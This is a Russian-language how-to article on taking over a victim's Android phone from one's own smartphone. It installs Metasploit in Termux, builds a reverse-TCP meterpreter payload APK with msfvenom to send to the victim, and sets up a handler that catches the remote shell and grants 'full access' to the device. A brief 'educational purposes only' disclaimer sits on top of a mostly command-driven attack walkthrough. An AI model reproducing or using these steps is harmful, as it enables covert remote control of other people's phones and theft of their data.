Взлом Android со смартфона. Полный доступ
Привет друзья, сегодня я расскажу вам о способе, благодаря которому можно взломать Android-устройство жертвы, с помощью собственного смартфона. Приятного изучения!
Замечу, что эта статья написана только для образовательных целей. Мы никого ни к чему не призываем, только в целях ознакомления!
Нам понадобится смартфон или планшет с установленной программой "Termux". Также в Termux уже должен быть установлен "Metasploit". О том, как установить Metasploit, читайте ниже.
Установка Metasploit
Установить Metasploit Framework (MSF) на Android 7 или выше можно в две команды:
pkg install unstable-repo
pkg install metasploit
На Android 5.x.x–6.x.x MSF устанавливают несколько другим методом:
curl -LO https://github.com/termux/termux-packages/files/3995119/metasploit_5.0.65-1_all.deb.gz
gunzip metasploit_5.0.65-1_all.deb.gz
dpkg -i metasploit_5.0.65-1_all.deb
apt -f install
Далее нужно перейти по следующему пути, введя команду:
cd /data/data/com.termux/files/usr/opt/metasploit-framework
Теперь создаем файл который будем кидать жертве, командой:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(наш IP) LPORT=4444 R> /sdcard/payload.apk
Мы создали файл, который хранится в пути /sdcard/payload.apk
Теперь нужно скинуть этот файл нашей жертве, которая должна установить его на своё устройство. Допустим жертва установила наш apk. Тогда мы запускаем metasploit и поочередно вводим каждую команду:
use exploit/milti/handler
set payload android/meterpreter/reverse_tcp
set LHOST (наш тот же IP)
set LPORT 4444
exploit
Если всё прошло успешно, вы получите полный доступ к устройству жертвы.